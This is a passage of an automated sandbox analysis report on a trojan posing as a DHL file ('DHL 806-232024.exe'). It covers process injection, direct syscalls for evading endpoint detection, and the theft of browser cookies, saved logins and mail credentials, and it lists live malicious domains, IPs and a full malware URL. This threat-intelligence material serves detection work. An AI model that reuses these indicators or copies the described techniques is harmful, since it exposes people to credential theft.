            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F56962 mov eax, dword ptr fs:[00000030h]2_2_02F56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F7096E mov eax, dword ptr fs:[00000030h]2_2_02F7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F7096E mov edx, dword ptr fs:[00000030h]2_2_02F7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F7096E mov eax, dword ptr fs:[00000030h]2_2_02F7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB0946 mov eax, dword ptr fs:[00000030h]2_2_02FB0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB892A mov eax, dword ptr fs:[00000030h]2_2_02FB892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC892B mov eax, dword ptr fs:[00000030h]2_2_02FC892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBC912 mov eax, dword ptr fs:[00000030h]2_2_02FBC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F28918 mov eax, dword ptr fs:[00000030h]2_2_02F28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F28918 mov eax, dword ptr fs:[00000030h]2_2_02F28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE908 mov eax, dword ptr fs:[00000030h]2_2_02FAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE908 mov eax, dword ptr fs:[00000030h]2_2_02FAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68EF5 mov eax, dword ptr fs:[00000030h]2_2_02F68EF5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36EE0 mov eax, dword ptr fs:[00000030h]2_2_02F36EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36EE0 mov eax, dword ptr fs:[00000030h]2_2_02F36EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36EE0 mov eax, dword ptr fs:[00000030h]2_2_02F36EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36EE0 mov eax, dword ptr fs:[00000030h]2_2_02F36EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FCAEB0 mov eax, dword ptr fs:[00000030h]2_2_02FCAEB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FCAEB0 mov eax, dword ptr fs:[00000030h]2_2_02FCAEB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBCEA0 mov eax, dword ptr fs:[00000030h]2_2_02FBCEA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBCEA0 mov eax, dword ptr fs:[00000030h]2_2_02FBCEA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBCEA0 mov eax, dword ptr fs:[00000030h]2_2_02FBCEA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2AE90 mov eax, dword ptr fs:[00000030h]2_2_02F2AE90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2AE90 mov eax, dword ptr fs:[00000030h]2_2_02F2AE90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2AE90 mov eax, dword ptr fs:[00000030h]2_2_02F2AE90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004F68 mov eax, dword ptr fs:[00000030h]2_2_03004F68
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F62E9C mov eax, dword ptr fs:[00000030h]2_2_02F62E9C
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_009281F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_009281F7
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_008FA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_008FA395
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_008FA364 SetUnhandledExceptionFilter,0_2_008FA364

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeNtQueryValueKey: Direct from: 0x76EF2BECJump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeNtOpenKeyEx: Direct from: 0x76EF3C9CJump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeNtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
            Source: C:\Users\user\Desktop\DHL 806-232024.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeThread register set: target process: 7080Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeThread APC queued: target process: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeJump to behavior
            Source: C:\Users\user\Desktop\DHL 806-232024.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2579008Jump to behavior
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_00928C93 LogonUserW,0_2_00928C93
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_008D3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_008D3B4C
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_008D4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_008D4A35
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_00934EC9 mouse_event,0_2_00934EC9
            Source: C:\Users\user\Desktop\DHL 806-232024.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL 806-232024.exe"Jump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_009281F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_009281F7
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_00934C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00934C03
            Source: DHL 806-232024.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: yAEEhNGBaPExAdMu.exe, 00000003.00000002.4530213466.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000003.00000000.2132130043.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000006.00000000.2283496849.0000000000F21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: DHL 806-232024.exe, yAEEhNGBaPExAdMu.exe, 00000003.00000002.4530213466.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000003.00000000.2132130043.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000006.00000000.2283496849.0000000000F21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: yAEEhNGBaPExAdMu.exe, 00000003.00000002.4530213466.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000003.00000000.2132130043.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000006.00000000.2283496849.0000000000F21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: yAEEhNGBaPExAdMu.exe, 00000003.00000002.4530213466.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000003.00000000.2132130043.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000006.00000000.2283496849.0000000000F21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_008F886B cpuid 0_2_008F886B
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_009050D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_009050D7
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_00912230 GetUserNameW,0_2_00912230
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_0090418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_0090418A
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_008D4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008D4AFE

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.320000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.320000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2214041996.0000000000320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4529624062.0000000002DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4530493179.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4530474719.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2215036751.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2214383859.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4530432523.0000000003460000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: DHL 806-232024.exeBinary or memory string: WIN_81
            Source: DHL 806-232024.exeBinary or memory string: WIN_XP
            Source: DHL 806-232024.exeBinary or memory string: WIN_XPe
            Source: DHL 806-232024.exeBinary or memory string: WIN_VISTA
            Source: DHL 806-232024.exeBinary or memory string: WIN_7
            Source: DHL 806-232024.exeBinary or memory string: WIN_8
            Source: DHL 806-232024.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.320000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.320000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2214041996.0000000000320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4529624062.0000000002DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4530493179.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4530474719.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2215036751.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2214383859.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4530432523.0000000003460000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_00946596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00946596
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_00946A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00946A5A
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts
            1
            Native API
            1
            DLL Side-Loading
            1
            Exploitation for Privilege Escalation
            1
            Disable or Modify Tools
            1
            OS Credential Dumping
            2
            System Time Discovery
            Remote Services1
            Archive Collected Data
            4
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts
            1
            Abuse Elevation Control Mechanism
            1
            Deobfuscate/Decode Files or Information
            21
            Input Capture
            1
            Account Discovery
            Remote Desktop Protocol1
            Data from Local System
            1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            1
            Abuse Elevation Control Mechanism
            Security Account Manager2
            File and Directory Discovery
            SMB/Windows Admin Shares1
            Email Collection
            4
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts
            3
            Obfuscated Files or Information
            NTDS116
            System Information Discovery
            Distributed Component Object Model21
            Input Capture
            4
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation
            1
            DLL Side-Loading
            LSA Secrets151
            Security Software Discovery
            SSH3
            Clipboard Data
            Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection
            2
            Valid Accounts
            Cached Domain Credentials2
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion
            DCSync3
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation
            Proc Filesystem11
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1580265 Sample: DHL 806-232024.exe Startdate: 24/12/2024 Architecture: WINDOWS Score: 100 28 www.joyesi.xyz 2->28 30 www.techchains.info 2->30 32 16 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus detection for URL or domain 2->46 50 6 other signatures 2->50 10 DHL 806-232024.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 yAEEhNGBaPExAdMu.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 netbtugc.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 yAEEhNGBaPExAdMu.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.rssnewscast.com 91.195.240.94, 49987, 49988, 49989 SEDO-ASDE Germany 22->34 36 www.3xfootball.com 154.215.72.110, 49732, 80 POWERLINE-AS-APPOWERLINEDATACENTERHK Seychelles 22->36 38 5 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            DHL 806-232024.exe29%VirustotalBrowse
            DHL 806-232024.exe45%ReversingLabsWin32.Trojan.AutoitInject
            DHL 806-232024.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://www.elettrosistemista.zip/fo8o/?SFst=D27DuB&UzG=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ==100%Avira URL Cloudmalware
